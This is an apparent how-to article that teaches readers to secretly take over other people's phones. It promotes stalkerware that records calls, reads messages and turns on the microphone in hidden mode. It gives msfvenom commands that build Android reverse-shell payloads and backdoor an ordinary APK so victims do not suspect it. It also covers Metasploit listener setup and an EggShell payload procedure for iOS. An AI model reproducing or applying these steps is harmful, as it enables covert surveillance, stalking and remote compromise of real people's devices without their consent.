How To Take Full Control of Someone’s Phone Remotely – 2020

There are several ways to take full control of someone’s smartphone remotely.

In this tutorial, I will list some popular methods that is used to gain remote access to others phone.

1. Gaining Remote Access to an Android Device

Method 1: Using a key logging software/Parental Control Apps

There are number of key logging softwares for android with great features.

Spyzie is a trusted key logging software with great features. Unfortunately you have to subscribe to use their service, but if you’re serious about it, it’s worth paying for. You can go to spyzie.com to try it out.

FlexiSpy is also another key logging software with all the features you could need. Although it has a bit of an outdated look into, they’re still trusted by people and provide all the necessary features, so it’s worth checking out.

FlexiSpy allows you to:

1. Record, intercept and listen in on android phone calls
2. Track GPS location of the android device
3. Spy on social media apps like Facebook, WhatsApp, Viber, Snapchat and 9 more.
4. Turn on the phones microphone and record or listen to it’s surroundings
5. Recording android VOIP calls; Facebook, Skype, Viber, Line and more
6. Spy on SMS, emails photos and more
7. Easy installation.
8. Runs in hidden or visible mode
9. Android phones can also be delivered with flexispy pre-installed

How To Install

1. Go to FlexiSpy.com and buy the product.
2. Download and install FlexiSpy on the device you want to monitor
3. Go to FlexiSpy Log in Portal and start monitoring the devices.

Making your own RAT using msfvenom:

There are open source softwares like msfvenom or metasploit you can use to make your own RAT from scratch or embed a payload into an existing app.

The benefits of making your own rats is, they’re free, for one thing. And you can embed a payload into another app so the user can’t tell wheter it’s a rat or an ordinary app.

In below steps, I’ll teach you how to create your own Android RAT.

Creating a RAT from scratch:

Requirements:

1. A computer with Kali linux (or any other Linux distro) installed on it.

2. Metasploit installed and updated.

3. Internet connection and a phone to test the rat on.

Method #1 Creating a Payload:

Step 1: enter this command in terminal:

msfvenom -p android/meterpreter/reverse_tcp LHOST=182.100.41.1 LPORT=5553 R >/sdcard/payload.apk

Note: replace the LHOST ip address with your own. To find your own ip address type ipconfig or ifconfig in your terminal.

This will create a payload in your specified location. You can change the location of payload.

Step 2: install the payload on your target device.

Step 3: type msfconsole in terminal. Then type “use multi/handler” and then type “set LHOST <your ip address>” like this: set LHOST 1.2.7.000.1 and then type “set LPORT 5553”

After that type exploit to listen to your payload.

Step 4: open the payload in android device. It’s ok if it crashes as it’s supposed to. You’ll know get a session in metasploit. Now use some of the metasploit commands to control the android device.

Step 5: all sone!

Method #2 injecting a payload in an existing apk file

Using this method, you’ll turn an ordinary apk to a rat. The user can use the apk just like it was before injection. They won’t suspect that it has a payload injected in it.

Step 1: type this in terminal: msfvenom -x /sdcard/Alarms/rat.apk -p android/meterpreter/reverse_tcp LHOST=182.100.41.1 LPORT=4444 -o /sdcard/CameraSample_backdoored.apk

Again, just like before, replace the ip address with your own. It is very important to do so, if the ip is wrong, you won’t get a session. Also replace the location(-o) with your own.

Step 2: copy the backdoored apk to the target android device, install it but don’t open it yet.

Step 3: type msfconsole and wait for it to start.

Step 4: type use multi/handler then type set LHOST <YOUR IP> and set LPORT 4444 and finally type exploit to start listening.

Step 5: open the backdoored apk in android device, it’ll look like an ordinary apk. Grant the permissions it asks for and you’ll get a session on metasploit.

Step 6: all done, congrats!

2. Hacking iOS

EggShell is a remote administration toolkit. It is mostly used as a post-exploit surveillance tool. It gives you a command line session with some other extra functionalities. Eggshell works for ios and Mac OS devices.

Requirements:

1. Internet connection

2. Linux/Mac OS laptop

3. Rooted IOS phone

4. Python 2.7+ installed

How To:

Step 1: Open a terminal window and clone the EggShell repo by typing:

git clone https://github.com/neoneggplant/eggshell

Step 2: type “cd eggshell” to enter the eggshell folder.

Step 3: run the eggshell script by typing “python eggshell.py”

Step 4: type 3 and enter to create a payload

Step 5: it’ll ask for your ip address and port number, type your ip address and press enter.

Step 6: it’ll ask for a port number, enter manually or leave it blank.

Step 7: you’ll have the choice to make it persistent, press y if you want it to be persistent.

Step 8: now add this cydia repo in your phone: http://lucasjackson.io/repo

Step 9: Install EggShell from the repo

Step 10: now open any terminal app on your iphone and run the command “eggshell”

Step 11: that was it, now you’ll get a session on your terminal!